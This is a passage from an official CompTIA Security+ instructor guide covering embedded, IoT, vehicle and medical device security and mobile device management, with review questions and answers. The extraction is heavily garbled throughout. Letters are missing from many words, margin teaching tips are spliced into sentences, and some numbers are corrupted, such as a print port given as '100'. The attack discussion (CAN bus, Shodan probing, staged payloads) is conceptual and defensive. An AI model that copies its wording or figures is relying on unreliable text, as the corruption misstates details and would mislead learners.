ffice's report into AC at federal offices gao.gov assets .pdf .
hysical security systems use networked camera systems CCT for surveillance.
nfortunately, some makes of camera systems have been found to have numerous
serious vulnerabilities that allow attackers either to prevent intrusions from being
recorded or to hi ack the cameras to perform their own surveillance. These issues

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 337

tend to a ect cheap consumer grade systems rather than enterprise models, but in
both cases it is necessary to evaluate the supplier to demonstrate that their security
monitoring and remediation support services are e ective.

Specialized Systems in IT Show Slide(s)

There are also speciali ed systems installed within office networks, such as printer and peciali ed ystems
oice over I oI e uipment. These systems must not be overlooked by security in IT
monitoring procedures.
Teaching
Multifunction Printers (MFPs) Tip

Most modern print devices, scanners, and fa machines have hard drives and In , security
researchers hacked
sophisticated firmware, allowing their use without attachment to a computer and the web interface of a
over a network. ften these print scan fa functions are performed by single devices, Canon i ma printer
referred to as multifunction printers (MFPs). nless they have been securely deleted, and used the e ploit
images and documents are fre uently recoverable from all of these machines. ome of to install the s
the more feature rich, networked printers and M s can also be used as a pivot point first person shooter
game Doom on the
to attack the rest of the network. These machines also have their own firmware that
printer firmware
must be kept patched and updated. wired.com
doom printer .
Voice over IP (VoIP)
Types of embedded systems are used to implement both oice over I oI endpoints
and media gateways. ndpoints can be individual handsets or conferencing units.
A media gateway might use a separate firmware to implement integration with
telephone and cellular networks.

here these devices connect directly to the Internet, a fingerprinting app or website
(shodan.io/explore/tag/voip or shodan.io/explore/tag/printer, for instance) can be used to
probe for unpatched vulnerabilities. There are Shodan ueries for any number of IoT and
ICS devices.

Shodan search results for sites responding to probes over port 100 (TCP port for raw print data).

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 338 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Specialized Systems for Vehicles and Drones

peciali ed ystems
Automobiles and unmanned aerial vehicles A , or drones, contain sophisticated
for ehicles and electronics to control engine and power systems, braking and landing, and suspension
Drones stability. Modern vehicles are increasingly likely to have navigation and entertainment
systems, plus driver assist or even driverless features, where the vehicle's automated
systems can take control of steering and braking. The locking, alarm, and engine
immobili er mechanisms are also likely to be part of the same system. ach of these
subsystems is implemented as an electronic control unit C , connected via one
or more controller area network CAN serial communications buses. The principal
e ternal interface is an nboard Diagnostics D II module. The D II also acts as a
gateway for multiple CAN buses.
The CAN bus operates in a somewhat similar manner to shared thernet and was
designed with ust as little security. C s transmit messages as broadcast so they
are received by all other C s on the same bus. There is no concept of source
addressing or message authentication. An attacker able to attach a malicious device
to the D II port is able to perform Do attacks against the CAN bus, threatening
the safety of the vehicle. There are also remote means of accessing the CAN bus,
such as via the cellular features of the automobile's navigation and entertainment
system wired.com hackers remotely kill eep highway . ome vehicles also
Show Slide(s)
implement on board i i, further broadening the attack surface.

peciali ed ystems
for Medical Devices Specialized Systems for Medical Devices
Teaching
Medical devices represent an array of systems potentially vulnerable to a wide range
Tip
of attacks. It is important to recogni e that use of these devices is not confined
to hospitals and clinics but includes portable devices such as cardiac monitors
ou can reference
the recall of certain
defibrillators and insulin pumps. As well as unsecure communication protocols, many
types of pacemaker of the control systems for these devices run on unsupported versions of operating
csoonline.com article systems such as indows because the costs of updating the software to work
with newer versions is high and disruptive to patient services. ome of the goals of
abbott pacemakers attacks on medical devices and services are as follows
vulnerable to hacking
need a firmware fi . • se compromised devices to pivot to networks storing medical data with the aim of
html for a firmware stealing protected health information I.
update to fi a
vulnerability that could • old medical units ransom by threatening to disrupt services.
allow an attacker to
drain the device's • ill or in ure patients or threaten to do so by tampering with dosage levels or
battery. device settings.

Show Slide(s)
ecurit or m edded stems
ecurity for mbedded mbedded systems must not be overlooked when designing the security system. The
ystems following methods can be used to mitigate risk in such environments.

Teaching Network Segmentation

Tip
There should be a Network segmentation is one of the core principles of network security. Network access
management plan for for static environments should only be re uired for applying firmware updates and
securing and updating management controls from the host software to the devices and for reporting status and
embedded devices. diagnostic information from the devices back to the host software. This control network
Control systems for should be separated from the corporate network using firewalls and LANs.
embedded systems
should generally ith environments such as CADA, the management software may re uire legacy
be separated from versions of operating systems, making the hosts particularly difficult to secure. Isolating
the corporate data
these hosts from others through network segmentation and using endpoint security
network, perhaps
using LANs and preventing the attachment of devices can help to ensure they do not become
firewalls. infected with malware or e posed to network e ploits.

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 339

Wrappers
ne way of increasing the security of data in transit for embedded systems is through the
use of wrappers, such as I ec. The only thing visible to an attacker or anyone sniffing
the wire is the I ec header, which describes only the tunnel endpoints. This is useful
for protecting traffic between trusted networks when the traffic has to go through an
untrusted network to go between them, or between trusted nodes on the same network.

Firmware Code Control and Inability to Patch

mbedded systems demonstrate one of the reasons that supply chain risks must be
carefully managed. rogramming logic implemented in A and firmware code must
not contain backdoors. irmware patching is ust as vital as keeping host software
up to date, but for many embedded systems, it is far more of a challenge
• Many embedded systems and IoT devices use low cost firmware chips and the
vendor never produces updates to fi security problems or only produces updates
for a relatively short product cycle while the device could remain in operational use
for much longer .

• Many embedded systems re uire manual updates, which are perceived as too time
consuming for a security department with other priorities to perform.

• Availability is a key attribute for most embedded deployments. atching without

service interruption may not be possible, and opportunities for downtime servicing
e tremely limited.

Cisco ive presents a useful overview of embedded system security re uirements

(ciscolive.com c dam r ciscolive us docs 01 pdf IOT- 11 .pdf).

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 340 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Embedded System Security Implications
Answer the following uestions

1. ther than cost hich actor primaril constrains em edded s stems in

terms of compute and networking?

ower many embedded systems must operate on battery power, and changing
the batteries is an onerous task, so power hungry systems like processing and high
bandwidth or long range networking are constrained.

2. True or alse hile ull customi a le the customer em edded s stems

are based on either the Raspberry Pi or the Arduino design.

alse these are e amples of one board computers based on the system on chip oC
design. They are widely used in education and leisure . ome are used for industrial
applications or for proof of concept designs, but most embedded systems are
manufactured to specific re uirements.

3. hat addressin component must e installed or confi ured or IoT

A LT based cellular radio, such as narrowband IoT, uses a subscriber identity module
IM card as an identifier. This can either be installed as a plug in card or configured as
an e IM chip on the system board or feature in a oC design.

4. ou are assistin ith the preparation o securit riefin s on em edded

s stems tailored to specific implementations o em edded s stems
ollo in the CompTIA ecurit s lla us ou ha e created the industr
specific ad ice or the ollo in sectors hich one do ou ha e le t to do

acilities Industrial anu acturin ner

Logistics transportation of components for assembly or distribution of finished

products.

5. Why should detailed vendor and product assessments be required before

allowing the use of IoT devices in the enterprise?

As systems with considerable computing and networking functionality, these devices

are sub ect to the same sort of vulnerabilities and e ploits as ordinary workstations
and laptops. It is critical to assess the vendor's policies in terms of the security
design for the product and support for identifying and mitigating any vulnerabilities
discovered in its use.

esson 1 Implementing ost Security Solutions | Topic 1 C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 341

Lesson 12
Summary
ou should be able to apply host hardening policies and technologies and to assess Teaching
risks from third party supply chains and embedded IoT systems. Tip
Check that students
uidelines or Implementin ost ecurit olutions are confident about
the content that has
been covered. If there
ollow these guidelines when you deploy or re assess endpoint security and integration
is time, re visit any
with embedded or IoT systems content e amples that
• Assess third party risks and ensure that appropriate procedures and agreements they have uestions
about. If you have
M , NDA, LA, A, M A are used to onboard approved vendors and partners as used all the available
technology and solutions providers. time for this lesson
block, note the issues,
• stablish configuration baselines for each host type. nsure that hosts are deployed and schedule time for
to the configuration baseline and set up monitoring to ensure compliance. a review later in the
course.
• Configure secure boot options and consider the use of attestation and policy
servers as the basis of a network access control mechanism. Interaction
Opportunity
• Configure storage encryption using full disk or self encrypting drives. ptionally, ask
students if they have
• Deploy an endpoint protection solution that meets security re uirements for e perience either of
functions such as anti malware, firewall, ID , D , and DL . IC CADA system
or AC . Ask if IoT
• stablish patch management procedures to test updates for di erent host groups devices are present in
and ensure management of both and third party software. their workplace, and
whether there is a
• Create a management plan for any IoT devices used in the workplace and ensure management plan for
there is no shadow IT deployment of unmanaged appliances. them.

• Assess security re uirements for IC and or CADA embedded systems

rocurement of secure oC, T , and A controller systems.

se of cryptographic controls for authentication, integrity, and resiliency.

se of specialist communications technologies.

Access control and segmentation for T networks.

endor support for patch management.

Lesson 12: Implementing Host Security Solutions

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 13
Implementing Secure Mobile Solutions

LESSON INTRODUCTION Teaching

Tip
Mobile devices are now the preferred client for many common work tasks, and network This lesson follows
management and security systems have had to adapt to accommodate them. The shift on from host security
toward mobile also presages a move toward unified management of endpoints, and by looking specifically
the use of virtualized workspaces as a better model for provisioning corporate apps at mobile devices.
and data processing. While there are a lot of
content examples to
cover, this subject area
Lesson Objectives is well-established at
A+ level, so you may
In this lesson, you will: be able to move quite
quickly through this
• Implement mobile device management. section.

• Implement secure mobile device connections.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 344 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 13A
Implement Mobile Device Management

Teaching EXAM OBJECTIVES COVERED

Tip 3.5 Given a scenario, implement secure mobile solutions
This is another topic
where lab support is
difficult. If you have
a corporate MDM or
As use of mobiles has permeated every type of organization, network management
EMM solution that
you can show to the and security suites have developed to ensure that they are not exploited as
students as a demo, unmanaged attack vectors. As a security professional, you will often have to configure
that would help. these management suites, and assist users with the device onboarding process.
Otherwise, students
should refer to vendor
implementation Mobile Device Deployment Models
guides.
Mobile devices have replaced computers for many email and diary management
Show Slide(s) tasks and are integral to accessing many other business processes and cloud-based
applications. A mobile device deployment model describes the way employees are
Mobile Device
provided with mobile devices and applications.
Deployment Models • Bring your own device (BYOD)—the mobile device is owned by the employee. The
mobile will have to meet whatever profile is re uired by the company in terms of
OS version and functionality) and the employee will have to agree on the installation
of corporate apps and to some level of oversight and auditing. This model is usually
the most popular with employees but poses the most difficulties for security and
network managers.

• Corporate owned, business only (COBO)—the device is the property of the

company and may only be used for company business.

• Corporate owned, personally-enabled (COPE)—the device is chosen and supplied

by the company and remains its property. The employee may use it to access
personal email and social media accounts and for personal web browsing sub ect
to whatever acceptable use policies are in force).

• Choose your own device (CYOD)—much the same as COPE but the employee is
given a choice of device from a list.

Virtualization can provide an additional deployment model. Virtual desktop

infrastructure DI means provisioning an desktop to interchangeable hardware.
The hardware only has to be capable of running a DI client viewer, or have browser
support a clientless HTML5 solution. The instance is provided "as new" for each session
and can be accessed remotely. The same technology can be accessed via a mobile
device such as a smartphone or tablet. This removes some of the security concerns
about D as the corporate apps and data are segmented from the other apps on
the device.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 345

Enterprise Mobility Management Show Slide(s)

nterprise mobility management MM is a class of management software designed Enterprise Mobility

to apply security policies to the use of mobile devices and apps in the enterprise. The Management
challenge of identifying and managing attached devices is often referred to as visibility.
MM software can be used to manage enterprise owned devices as well as D. Teaching
There are two main functions of an EMM product suite: Tip
• Mobile device management (MDM)—sets device policies for authentication, At this point, MDM
and MAM are probably
feature use camera and microphone , and connectivity. MDM can also allow device
best thought of as
resets and remote wipes. functionality within
products, rather than
• Mobile application management (MAM)—sets policies for apps that can process product classes.
corporate data, and prevents data transfer to personal apps. This type of solution Note the trend toward
configures an enterprise managed container or workspace. unified endpoint
management,
Additionally, distinguishing whether client endpoints are mobile or fi ed is not really including IoT devices.
a critical factor for many of these management tasks, with the consequence that
the latest suites aim for visibility across PC, laptop, smartphone, tablet, and even IoT Interaction
devices. These suites are called unified endpoint mana ement redmondmag. Opportunity
com Articles nified ndpoint Management.asp ). Encourage students
to browse the vendor
The core functionality of endpoint management suites extends the concept of sites referenced in the
network access control NAC solutions. The management software logs the use of a text to get a better
device on the network and determines whether to allow it to connect or not, based idea of the features
on administrator-set parameters. When the device is enrolled with the management and capabilities of
software, it can be configured with policies to allow or restrict use of apps, corporate EMM/UEM suites.
data, and built-in functions, such as a video camera or microphone.
ome MM M solutions include Air atch air-watch.com), Microsoft Intune
microsoft.com/en-us/microsoft-365/enterprise-mobility-security/microsoft-intune),
ymantec roadcom broadcom.com/products/cyber-security/endpoint/end-user/
protection-mobile , and Citri ndpoint Management formerly enMobile citrix.com/
products/citrix-endpoint-management).

i in the nterprise Show Slide(s)

In Apple's iOS ecosystem, third-party developers can create apps using Apple's i in the nterprise
oftware Development it, available only on Mac . Apps have to be submitted to
and approved by Apple before they are released to users via the App Store. Corporate Teaching
control over i devices and distribution of corporate and usiness to usiness Tip
apps is facilitated by participating in the Device nrollment rogram support.apple. Remind students of
com/business , the olume urchase rogram, and the Developer nterprise rogram the importance of
developer.apple.com/programs/enterprise). Another option is to use an EMM suite keeping developer
and its development tools to create a "wrapper" for the corporate app. accounts secure.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 346 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring iOS device enrollment in icrosoft s Intune E suite.

(Screenshot used with permission from icrosoft.)

Most iOS attacks are the same as with any system; users click malicious links or enter
information into phishing sites, for instance. As a closed and proprietary system, it
should not be possible for malware to infect an iOS device as all code is updated from
Apple's servers only. There remains the risk that a vulnerability in either iOS or an app
could be discovered and exploited. In this event, users would need to update iOS or the
app to a version that mitigates the exploit.

Show Slide(s) Android in the nterprise

Android in the
Android's open source basis means that there is more scope for vendor specific
nterprise versions. The app model is also more relaxed, with apps available from both Google
lay and third party sites, such as Ama on's app store. The D is available on Linu ,
indows, and mac . The Android nterprise android.com/enterprise) program
facilitates use of EMM suites and the containerization of corporate workspaces.
Additionally, amsung has a workspace framework called N samsung.com/us/
business/solutions/samsung-knox) to facilitate EMM control over device functionality.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 347

Enrolling an Android smartphone with Intune.

(Android is a trademark of Google C.)

iOS devices are normally updated very quickly. With Android, the situation is less
consistent, as updates often depend on the handset vendor to complete the new
version or issue the patch for their avor of Android. Android is more open and
there is Android malware, though as with Apple it is difficult for would be hackers and
spammers to get it into any of the major app repositories.

One techni ue used is called Staged Payloads. The malware writers release an app that
appears innocuous in the store but once installed it attempts to download additional
components infected with malware (zdnet.com article android-security-sneaky-three-stage-
malware-found-in-google-play-store). Google has implemented a server-side malware
scanning product (Play Protect) that will both warn users if an app is potentially damaging
and scan apps that have already been purchased, and warn the user if any security issues
have been discovered.

Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid
source.android.com/security/selinux uses mandatory access control MAC policies to
run apps in sandbo es. hen the app is installed, access is granted or not to specific
shared features, such as contact details, M te ting, and email.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 348 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring app permissions in Android OS. (Android is a trademark of Google C.)

Show Slide(s) o ile Access Control stems

Mobile Access Control
If a threat actor is able to gain access to a smartphone or tablet, they can obtain a huge
ystems amount of information and the tools with which to launch further attacks. Quite apart from
confidential data files that might be stored on the device, it is highly likely that the user has
Teaching cached passwords for services such as email or remote access N and websites.
Tip
For students who Smartphone Authentication
have taken A+, this
subject matter should The majority of smartphones and tablets are single-user devices. Access control can be
be familiar. Just note implemented by configuring a screen lock that can only be bypassed using the correct
the way that EMM can password, IN, or swipe pattern. Many devices now support biometric authentication,
be used to enforce usually as a fingerprint reader but sometimes using facial or voice recognition.
authentication types.

Configuring authentication and profile policies using Intune E ote that the policy allows the user
to have a different type of authentication (or none at all) to the workspace hosting corporate apps
and data. (Screenshot used with permission from icrosoft.)

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 349

Strong passwords should always be set on mobile devices, as simple -digit PI codes can
easily be brute-forced. Swipe patterns are vulnerable to poor user choices (arstechnica.
com information-technology 01 0 new-data-uncovers-the-surprising-predictability-of-
android-lock-patterns), such as choosing letter or box patterns, plus the tendency for the
grease trail to facilitate a smudge attack.

Screen Lock
The screen lock can also be configured with a lockout policy. This means that if an
incorrect passcode is entered, the device locks for a set period. This could be configured
to escalate so the first incorrect attempt locks the device for seconds while the third
locks it for 10 minutes, for instance). This deters attempts to guess the passcode.

Context-Aware Authentication
It is also important to consider newer authentication models, such as context-aware
authentication. For example, smartphones now allow users to disable screen locks
when the device detects that it is in a trusted location, such as the home. Conversely,
an enterprise may seek more stringent access controls to prevent misuse of a device.
For example, even if the device has been unlocked, accessing a corporate workspace
might require the user to authenticate again. It might also check whether the network
connection can be trusted that it is not an open i I hotspot, for instance .

Remote Wipe Show Slide(s)

A remote wipe or kill switch means that if the handset is stolen it can be set to the Remote Wipe
factory defaults or cleared of any personal data saniti ation . ome utilities may also
be able to wipe any plug-in memory cards too. The remote wipe could be triggered by
several incorrect passcode attempts or by enterprise management software. Other
features include backing up data from the phone to a server first and displaying a
Lost stolen phone return to message on the handset.

ost corporate messaging systems come with a remote wipe feature (such as this one provided with
Intermedia mail hosting), allowing mail, calendar, and contacts information to be deleted from mobile
devices. (Screenshot used with permission from Intermedia.)

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 350 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to
the network, then hacking the phone and disabling the security.

Show Slide(s) Full Device Encryption and External Media

ull Device ncryption
All but the early versions of mobile device OSes for smartphones and tablets provide
and External Media full device encryption. In iOS, there are various levels of encryption.
• All user data on the device is always encrypted but the key is stored on the device.
Teaching
This is primarily used as a means of wiping the device. The OS just needs to delete
Tip
the key to make the data inaccessible rather than wiping each storage location.
Note that full disk
encryption makes a • mail data and any apps using the Data rotection option are sub ect to a second
handset less usable as
round of encryption using a key derived from and protected by the user's credential.
a phone, so encryption
is applied to user data This provides security for data in the event that the device is stolen. Not all user
areas rather than the data is encrypted using the Data rotection option contacts, M messages, and
whole device. pictures are not, for example.

In i , Data rotection encryption is enabled automatically when you configure a

password lock on the device. In Android, there are substantial di erences to encryption
options between versions source.android.com/security/encryption). As of Android 10,
there is no full disk encryption as it is considered too detrimental to performance. User
data is encrypted at file level by default.
A mobile device contains a solid state ash memory drive for persistent storage of
apps and data. Some Android handsets support removable storage using external
media, such as a plug in Micro ecureDigital D card slot some may support the
connection of USB-based storage devices. The mobile OS encryption software might
allow encryption of the removable storage too but this is not always the case. Care
should be taken to apply encryption to storage cards using third-party software if
necessary and to limit sensitive data being stored on them.
A Micro D M is a small form factor hardware security module designed to store
cryptographic keys securely. This allows the cryptographic material to be used with
di erent devices, such as a laptop and smartphone.

Show Slide(s) ocation er ices

Location ervices
eolocation is the use of network attributes to identify or estimate the physical
position of a device. The device uses location services to determine its current position.
Teaching Location services can make use of two systems:
Tip • lobal ositioning ystem a means of determining the device's latitude and
Make sure students longitude based on information received from satellites via a GPS sensor.
can distinguish the
various geo-something • Indoor Positioning System (IPS)—works out a device's location by triangulating
technologies. its proximity to other radio sources, such as cell towers, Wi-Fi access points, and
luetooth ID beacons.

Location services is available to any app where the user has granted the app
permission to use it.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 351

Using ind y evice to locate an Android smartphone. (Android is a trademark of Google C.)

The primary concern surrounding location services is one of privacy. Although very
useful for maps and turn-by-turn navigation, it provides a mechanism to track an
individual's movements, and therefore their social and business habits. The problem
is further compounded by the plethora of mobile apps that require access to location
services and then both send the information to the application developers and store
it within the device's file structure. If an attacker can gain access to this data, then
stalking, social engineering, and even identity theft become real possibilities.

Geofencing and Camera/Microphone Enforcement

Geofencing is the practice of creating a virtual boundary based on real-world
geography. Geofencing can be a useful tool with respect to controlling the use of
camera or video functions or applying context-aware authentication. An organization
may use geofencing to create a perimeter around its office property, and subse uently,
limit the functionality of any devices that exceed this boundary. An unlocked
smartphone could be locked and forced to re-authenticate when entering the
premises, and the camera and microphone could be disabled. The device's position is
obtained from location services.

Restricting device permissions such as camera and screen capture using Intune.
(Screenshot used with permission from icrosoft.)

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 352 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

GPS Tagging
tagging is the process of adding geographical identification metadata, such as
the latitude and longitude where the device was located at the time, to media such as
photographs, SMS messages, video, and so on. It allows the app to place the media
at specific latitude and longitude coordinates. tagging is highly sensitive personal
information and potentially confidential organi ational data also. tagged pictures
uploaded to social media could be used to track a person's movements and location.
For example, a Russian soldier revealed troop positions by uploading GPS tagged
selfies to Instagram arstechnica.com/tech-policy/2014/08/opposite-of-opsec-russian-
soldier posts selfies from inside ukraine .

Show Slide(s) Application ana ement

Application
When a device is joined to the corporate network through enrollment with
Management management software, it can be configured into an enterprise workspace mode in
which only a certain number of authorized applications can run.
Teaching
Tip
Note that sideloading
is both a way of
adding enterprise
apps and an
undesirable behavior
that needs to be
prevented on
corporate-owned
devices.

Endpoint management software such as icrosoft Intune can be used to approve or prohibit apps.
(Screenshot used with permission from icrosoft.)

A trusted app source is one that is managed by a service provider. The service provider
authenticates and authori es valid developers, issuing them with a certificate to use
to sign their apps and warrant them as trusted. It may also analyze code submitted to
ensure that it does not pose a security or privacy risk to its customers or remove apps
that are discovered to pose such a risk). It may apply other policies that developers
must meet, such as not allowing apps with adult content or apps that duplicate the
function of core OS apps.
The mobile defaults to restricting app installations to the linked store App tore for
iOS and Play for Android). Most consumers are happy with this model but it does not
work so well for enterprises. It might not be appropriate to deliver a custom corporate
app via a public store, where anyone could download it. Apple operates enterprise
developer and distribution programs to solve this problem, allowing private app
distribution via Apple usiness Manager developer.apple.com/business/distribute).
Google's Play store has a private channel option, called Managed Google Play. Both
these options allow an EMM/UEM suite to push apps from the private channel to
the device.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 353

nlike i , Android allows for selection of di erent stores and installation of untrusted
apps from any third party, if this option is enabled by the user. With unknown sources
enabled, untrusted apps can be downloaded from a website and installed using the
.apk file format. This is referred to as sideloading.
Conversely, a management suite might be used to prevent the use of third-party stores
or sideloading and block unapproved app sources.

Content ana ement Show Slide(s)

Containerization allows the employer to manage and maintain the portion of the Content Management
device that interfaces with the corporate network. An enterprise workspace with a
defined selection of apps and a separate container is created. This container isolates Teaching
corporate apps from the rest of the device. There may be a requirement for additional Tip
authentication to access the workspace. Note that the
security of these
The container can also enforce storage segmentation. With storage segmentation the
containerization
container is associated with a directory on the persistent storage device that is not mechanisms depends
readable or writable by apps that are not in the container. Conversely, apps cannot upon the device not
write to areas outside the container, such as external media or using copy and paste being rooted.
to a non container app. App network access might be restricted to a N tunneled
through the organization's security system.
The enterprise is thereby able to maintain the security it needs, without having to
enforce policies that a ect personal use, apps, or data.
Containeri ation also assists content management and data loss prevention DL
systems. A content management system tags corporate or confidential data and
prevents it from being shared or copied to unauthorized external media or channels,
such as non corporate email systems or cloud storage services.

ootin and ail rea in Show Slide(s)

Like Windows and Linux, the account used to install the OS and run kernel-level Rooting and
processes is not the one used by the device owner. Users who want to avoid the Jailbreaking
restrictions that some vendors, handset Ms, and telecom providers carriers put
on the devices must use some type of privilege escalation: Teaching
Tip
• Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device. For Detecting whether
a device has been
some devices it is necessary to e ploit a vulnerability or use custom firmware. rooted is not
Custom firmware is essentially a new Android image applied to the device. This straightforward.
can also be referred to as a custom ROM, after the term for the read only memory You might want to
chips that used to hold firmware. point students to
Google's attestation
• Jailbreaking—iOS is more restrictive than Android so the term "jailbreaking" API documentation
became popular for exploits that enabled the user to obtain root privileges, for more information
on root detection
sideload apps, change or add carriers, and customize the interface. iOS jailbreaking
developer.android.
is accomplished by booting the device with a patched kernel. For most exploits, com/training/
this can only be done when the device is attached to a computer when it boots safetynet/attestation).
tethered ailbreak .

• Carrier unlocking—for either iOS or Android, this means removing the restrictions
that lock a device to a single carrier.

Rooting or jailbreaking mobile devices involves subverting the security measures on

the device to gain administrative access to it. This also has the side e ect of leaving
many security measures permanently disabled. If the user has root permissions, then
essentially any management agent software running on the device is compromised.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 354 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

If the user has applied a custom firmware image, they could have removed the
protections that enforce segmentation. The device can no longer be assumed to run a
trusted OS.
MM M has routines to detect a rooted or ailbroken device or custom firmware with
no valid developer code signature and prevent access to an enterprise app, network,
or workspace. Containerization and enterprise workspaces can use cryptography to
protect the workspace in a way that is much harder to compromise than a local agent,
even from a rooted ailbroken device.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 355

Review Activity:
Mobile Device Management
Answer the following questions:

1. What type of deployment model(s) allow users to select the mobile device
make and model?

ring our wn Device D and Choose our wn Device C D.

2. How does VDI work as a mobile deployment model?

irtual Desktop Infrastructure DI allows a client device to access a M. In this

scenario, the mobile device is the client device. Corporate data is stored and processed
on the VM so there is less chance of it being compromised, even though the client
device itself is not fully managed.

3. Company policy requires that you ensure your smartphone is secured from
unauthorized access in case it is lost or stolen. To prevent someone from
accessing data on the device immediately after it has been turned on, what
security control should be used?

Screen lock.

4. An employee's car was recently broken into, and the thief stole a company
tablet that held a great deal of sensitive data. You've already taken the
precaution of securing plenty of backups of that data. What should you do
to be absolutely certain that the data doesn't fall into the wrong hands?

Remotely wipe the device, also referred to as a kill switch.

5. What is containerization?

A mobile app or workspace that runs within a partitioned environment to prevent

other unauthori ed apps from interacting with it.

6. What is the process of sideloading?

The user installs an app directly onto the device rather than from an official app store.

7. Why might a company invest in device control software that prevents the
use of recording devices within company premises?

To hinder physical reconnaissance and espionage.

8. Why is a rooted or jailbroken device a threat to enterprise security?

nterprise Mobility Management MM solutions depend on the device user not

being able to override their settings or change the e ect of the software. A rooted or
jailbroken device means that the user could subvert the access controls.

Lesson 13: Implementing Secure Mobile Solutions | Topic 13A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 356 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 13B
Implement Secure Mobile
e ice onnections

Teaching EXAM OBJECTIVES COVERED

Tip 1. Given a scenario, analyze potential indicators associated with network attacks
This topic completes 3.5 Given a scenario, implement secure mobile solutions
the coverage of
objective 3.5 by
looking at connection
As well as authentication and authorization for features and apps, management
methods. We also suites can also assist with networking options for mobile. You must be able to disable
cover the Bluetooth, communication types that are not secure for local networks, and advise users about
N C, and ID attacks the security of communications when they use their devices remotely.
from 1.4

Show Slide(s) Cellular and Connection ethods

Cellular and GPS
Mobile devices use a variety of connection methods to establish communications in
Connection Methods local and personal area networks and for Internet data access via service providers.

ocking down Android connectivity methods with Intune note that most settings can be applied only
to Samsung O -capable devices. (Screenshot used with permission from icrosoft.)

Cellular Data Connections

Smartphones and some tablets use the cell phone network for calls and data access. A
cellular data connection is less likely to be sub ect to monitoring and filtering. It may be
appropriate to disable it when a device has access to an enterprise network or data, to
prevent its use for data e filtration.
There have been attacks and successful exploits against the major infrastructure
and protocols underpinning the telecoms network, notably the hack theregister.
com hackers fire up ss aw). There is little that either companies or

Lesson 13: Implementing Secure Mobile Solutions | Topic 13B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 357

individuals can do about these weaknesses. The attacks require a high degree of
sophistication and are relatively uncommon.

Global Positioning System (GPS)

A global positioning system (GPS) sensor triangulates the device position using
signals from orbital GPS satellites. As this triangulation process can be slow, most
smartphones use Assisted A to obtain coordinates from the nearest cell
tower and adjust for the device's position relative to the tower. A-GPS uses cellular
data. GPS satellites are operated by the US Government. Some GPS sensors can
use signals from other satellites, operated by the alileo , ussia L NA , or
China eiDou .
GPS signals can be jammed or even spoofed using specialist radio equipment. This
might be used to defeat geofencing mechanisms, for instance kaspersky.com/blog/
gps spoofing protection ).

i i and Tetherin Connection ethods Show Slide(s)

Mobile devices usually default to using a Wi-Fi connection for data, if present. If the Wi-Fi and Tethering
